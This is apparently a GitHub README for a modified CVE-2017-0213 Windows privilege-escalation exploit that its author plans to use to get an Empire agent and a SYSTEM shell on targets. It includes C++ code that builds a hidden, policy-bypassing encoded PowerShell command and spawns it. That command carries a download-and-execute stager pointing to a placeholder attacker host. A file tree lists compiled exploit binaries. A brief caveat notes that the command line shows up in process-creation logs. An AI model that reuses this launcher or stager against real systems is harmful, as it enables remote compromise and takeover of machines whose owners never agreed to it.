A version of CVE-2017-0213 that I plan to use with an Empire stager

### CVE-2017-0213
I used the code provided by the Google Project Zero Team here: https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213
The changes I made allow the program to call a PowerShell one-liner that will give me an Empire agent on the target.
I will use this for privilege escalation through Empire.
I know it is not a PowerShell/Python script, so it kind of ruins the spirit of Empire... but oh well; it gets me a system shell, which I like :)
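The hand-off the README describes, a native exploit spawning a PowerShell one-liner, is shown below as an added example; it is not the modified code in this repository and not Empire's own launcher. PowerShell's `-EncodedCommand` (`-Enc`) argument takes the script as base64 of its UTF-16LE bytes, which is the form an Empire launcher is emitted in, so the example builds that encoding and the full command line, and on Windows spawns it with `CreateProcessA`. The stager string and the `http://EMPIRE_HOST/launcher` URL are placeholders I made up for the example; a real run would paste in the launcher text Empire generates.

```cpp
#include <cstdint>
#include <iostream>
#include <string>
#include <vector>
#ifdef _WIN32
#include <windows.h>
#endif

// Standard base64 (RFC 4648 alphabet, '=' padding). PowerShell's -EncodedCommand
// expects exactly this encoding applied to the UTF-16LE bytes of the script.
std::string Base64Encode(const std::vector<uint8_t>& in) {
    static const char kTable[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    std::string out;
    size_t i = 0;
    for (; i + 2 < in.size(); i += 3) {
        uint32_t n = (uint32_t(in[i]) << 16) | (uint32_t(in[i + 1]) << 8) | in[i + 2];
        out += kTable[(n >> 18) & 63];
        out += kTable[(n >> 12) & 63];
        out += kTable[(n >> 6) & 63];
        out += kTable[n & 63];
    }
    size_t rem = in.size() - i;  // 0, 1 or 2 trailing bytes
    if (rem == 1) {
        uint32_t n = uint32_t(in[i]) << 16;
        out += kTable[(n >> 18) & 63];
        out += kTable[(n >> 12) & 63];
        out += "==";
    } else if (rem == 2) {
        uint32_t n = (uint32_t(in[i]) << 16) | (uint32_t(in[i + 1]) << 8);
        out += kTable[(n >> 18) & 63];
        out += kTable[(n >> 12) & 63];
        out += kTable[(n >> 6) & 63];
        out += '=';
    }
    return out;
}

// PowerShell decodes the command as UTF-16LE. This example assumes an ASCII
// script, so each byte becomes the pair (byte, 0x00).
std::vector<uint8_t> ToUtf16Le(const std::string& ascii) {
    std::vector<uint8_t> out;
    out.reserve(ascii.size() * 2);
    for (unsigned char c : ascii) {
        out.push_back(c);
        out.push_back(0x00);
    }
    return out;
}

std::string EncodeForPowerShell(const std::string& script) {
    return Base64Encode(ToUtf16Le(script));
}

// Full command line: -NoP skips profiles, -NonI is non-interactive, -W Hidden
// hides the window, -Exec Bypass avoids execution-policy prompts.
std::string BuildLauncherCommandLine(const std::string& script) {
    return "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " +
           EncodeForPowerShell(script);
}

#ifdef _WIN32
// Spawn powershell.exe with the encoded launcher. CreateProcessA may modify
// the command-line buffer, so it gets a writable copy. Returns false on failure.
bool SpawnLauncher(const std::string& script) {
    std::string cmd = BuildLauncherCommandLine(script);
    std::vector<char> buf(cmd.begin(), cmd.end());
    buf.push_back('\0');
    STARTUPINFOA si = {};
    si.cb = sizeof(si);
    PROCESS_INFORMATION pi = {};
    if (!CreateProcessA(nullptr, buf.data(), nullptr, nullptr, FALSE,
                        CREATE_NO_WINDOW, nullptr, nullptr, &si, &pi)) {
        return false;
    }
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return true;
}
#endif

int main() {
    // Placeholder standing in for the launcher text Empire generates (assumption).
    const std::string stager =
        "IEX (New-Object Net.WebClient).DownloadString('http://EMPIRE_HOST/launcher')";
    std::cout << BuildLauncherCommandLine(stager) << "\n";
#ifdef _WIN32
    std::cout << (SpawnLauncher(stager) ? "spawned" : "CreateProcess failed") << "\n";
#endif
    return 0;
}
```

Two caveats a practitioner would want: the encoder assumes an ASCII script, so a launcher containing non-ASCII characters needs a real UTF-8 to UTF-16LE conversion before encoding; and the `powershell.exe ... -Enc <long base64>` command line is the most visible part of the whole chain, since process-creation logging (Windows Security event 4688 with command-line auditing, or Sysmon event 1) records it verbatim and a long encoded command is a common hunting signature.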
Repository contents (tree output, including the checked-in Visual Studio build artifacts):

```text
[4.0K]  /data/pocs/f0da068256a57fe98048c529b26c8135cb69ab9a
├── [4.0K]  CVE-2017-0213
│   ├── [ 29K]  CVE-2017-0213.cpp
│   ├── [4.1K]  CVE-2017-0213.vcxproj
│   ├── [ 996]  CVE-2017-0213.vcxproj.filters
│   ├── [4.0K]  Debug
│   │   ├── [ 147]  CVE-2017-0213.log
│   │   ├── [351K]  CVE-2017-0213.obj
│   │   ├── [4.0K]  CVE-2017-0213.tlog
│   │   │   ├── [ 910]  CL.command.1.tlog
│   │   │   ├── [ 46K]  CL.read.1.tlog
│   │   │   ├── [ 856]  CL.write.1.tlog
│   │   │   ├── [ 246]  CVE-2017-0213.lastbuildstate
│   │   │   ├── [1.5K]  link.command.1.tlog
│   │   │   ├── [4.1K]  link.read.1.tlog
│   │   │   └── [ 816]  link.write.1.tlog
│   │   ├── [939K]  vc141.idb
│   │   └── [724K]  vc141.pdb
│   └── [4.0K]  Release
│       ├── [ 404]  CVE-2017-0213.log
│       ├── [1.1M]  CVE-2017-0213.obj
│       ├── [4.0K]  CVE-2017-0213.tlog
│       │   ├── [ 930]  CL.command.1.tlog
│       │   ├── [ 45K]  CL.read.1.tlog
│       │   ├── [ 656]  CL.write.1.tlog
│       │   ├── [ 248]  CVE-2017-0213.lastbuildstate
│       │   ├── [2.4K]  CVE-2017-0213.write.1u.tlog
│       │   ├── [1.5K]  link.command.1.tlog
│       │   ├── [4.2K]  link.read.1.tlog
│       │   └── [ 432]  link.write.1.tlog
│       └── [484K]  vc141.pdb
├── [1.1K]  CVE-2017-0213.sln
├── [4.0K]  Debug
│   ├── [134K]  CVE-2017-0213.exe
│   ├── [722K]  CVE-2017-0213.ilk
│   └── [868K]  CVE-2017-0213.pdb
├── [ 468]  README.md
└── [4.0K]  Release
    ├── [142K]  CVE-2017-0213.exe
    ├── [380K]  CVE-2017-0213.iobj
    └── [ 92K]  CVE-2017-0213.ipdb

7 directories, 33 files
```